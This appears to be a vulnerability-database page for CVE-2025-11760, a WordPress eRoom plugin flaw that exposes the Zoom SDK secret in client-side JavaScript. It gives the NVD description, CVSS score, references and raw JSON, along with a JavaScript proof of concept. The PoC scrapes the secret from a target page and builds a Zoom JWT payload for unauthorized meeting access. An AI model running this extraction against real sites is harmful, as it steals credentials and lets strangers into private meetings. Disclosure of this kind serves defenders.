Security Vulnerability Report
CVE-2025-11760 CVSS 5.3 MEDIUM

CVE-2025-11760

Published: 2025-10-25 02:15:38
Last Modified: 2026-04-15 00:35:42

Description

The eRoom – Webinar & Meeting Plugin for Zoom, Google Meet, Microsoft Teams plugin for WordPress is vulnerable to exposure of sensitive information in all versions up to, and including, 1.5.6. This is due to the plugin exposing Zoom SDK secret keys in client-side JavaScript within the meeting view template. This makes it possible for unauthenticated attackers to extract the sdk_secret value, which should remain server-side, compromising the security of the Zoom integration and allowing attackers to generate valid JWT signatures for unauthorized meeting access.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Note: this is the secondary metric carried in the NVD record. It scores only the disclosure of the secret itself (C:L, I:N, A:N); the downstream effect of using that secret to mint valid Zoom SDK tokens is not reflected in the base score, so treat 5.3 as a floor when prioritising.

Configurations (Affected Products)

No CPE configuration data is present in the NVD record (vulnStatus: Deferred).

Affected product: eRoom – Webinar & Meeting Plugin for Zoom, Google Meet, Microsoft Teams < 1.5.7 (all versions up to and including 1.5.6; fixed in 1.5.7).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-11760 PoC - Extract exposed Zoom SDK Secret
// Target: WordPress site with eRoom plugin <= 1.5.6
// Runs under Node 18+ (global fetch) or in a browser console on the target origin.
const targetUrl = 'https://vulnerable-site.com/meeting/123';

async function extractSdkSecret() {
  try {
    // Method 1: Fetch page source and extract. The vulnerable meeting view template
    // inlines the secret in client-side JavaScript, so it is present in the raw HTML.
    const response = await fetch(targetUrl);
    const html = await response.text();

    // Search for an sdk_secret assignment or object/JSON key, i.e. any of
    //   sdk_secret = "...", sdk_secret: "...", "sdk_secret": "..."
    const secretMatch = html.match(/["']?sdk_secret["']?\s*[=:]\s*["']([^"']+)["']/i);
    if (secretMatch && secretMatch[1]) {
      console.log('[+] SDK Secret found:', secretMatch[1]);
      return secretMatch[1];
    }

    // Method 2: Check for an embedded `var sdk_secret = "..."` declaration
    const scriptMatch = html.match(/var\s+sdk_secret\s*=\s*["']([^"']+)["']/i);
    if (scriptMatch && scriptMatch[1]) {
      console.log('[+] SDK Secret found (var):', scriptMatch[1]);
      return scriptMatch[1];
    }

    console.log('[-] SDK Secret not found in page source');
    return null;
  } catch (error) {
    console.error('[-] Error:', error.message);
    return null;
  }
}

// Build the Zoom Meeting SDK JWT payload. Signing requires the extracted secret
// (e.g. jsonwebtoken, HS256). The public SDK key also needs to be taken from the
// same page; it defaults to a placeholder here.
function generateZoomJwt(sdkSecret, meetingNumber, sdkKey = 'YOUR_SDK_KEY') {
  const now = Math.round(Date.now() / 1000);
  // JWT payload structure for Zoom SDK
  const payload = {
    sdkKey: sdkKey,
    appKey: sdkKey,
    mn: meetingNumber,
    role: 0,            // 0=participant, 1=host
    iat: now,
    exp: now + 3600,
    tokenExp: now + 3600
  };
  // Sign with extracted sdk_secret
  // const jwt = require('jsonwebtoken');
  // return jwt.sign(payload, sdkSecret);
  console.log('[+] JWT payload prepared, sign with sdk_secret');
  return payload;
}

// Execute PoC
(async () => {
  console.log('[*] CVE-2025-11760 PoC - eRoom Plugin SDK Secret Extraction');
  const secret = await extractSdkSecret();
  if (secret) {
    console.log('\n[!] Use extracted secret to generate unauthorized Zoom access');
  }
})();

References

Vulnerable template line in the 1.5.6 tag (templates/single/meeting_view.php, line 173): https://plugins.trac.wordpress.org/browser/eroom-zoom-meetings-webinar/tags/1.5.6/templates/single/meeting_view.php#L173
Fix changeset (trunk diff, file 4): https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3379064%40eroom-zoom-meetings-webinar%2Ftrunk&old=3375935%40eroom-zoom-meetings-webinar%2Ftrunk&sfp_email=&sfph_mail=#file4
Wordfence advisory: https://www.wordfence.com/threat-intel/vulnerabilities/id/0baaa6b7-3884-465e-bae3-46edab6312d4?source=cve
Weakness: CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11760",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-25T02:15:38.397",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The eRoom – Webinar & Meeting Plugin for Zoom, Google Meet, Microsoft Teams plugin for WordPress is vulnerable to exposure of sensitive information in all versions up to, and including, 1.5.6. This is due to the plugin exposing Zoom SDK secret keys in client-side JavaScript within the meeting view template. This makes it possible for unauthenticated attackers to extract the sdk_secret value, which should remain server-side, compromising the security of the Zoom integration and allowing attackers to generate valid JWT signatures for unauthorized meeting access."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/eroom-zoom-meetings-webinar/tags/1.5.6/templates/single/meeting_view.php#L173",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3379064%40eroom-zoom-meetings-webinar%2Ftrunk&old=3375935%40eroom-zoom-meetings-webinar%2Ftrunk&sfp_email=&sfph_mail=#file4",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0baaa6b7-3884-465e-bae3-46edab6312d4?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}